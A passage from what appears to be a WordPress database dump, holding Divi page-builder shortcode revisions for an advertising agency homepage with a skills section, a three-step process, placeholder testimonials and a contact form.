box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.4.9\" field_id=\"Mobile_No\" field_title=\"Mobile No\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 21:10:12','2020-07-08 21:10:12','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(283,1,'2020-07-08 21:25:36','2020-07-08 21:25:36','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" 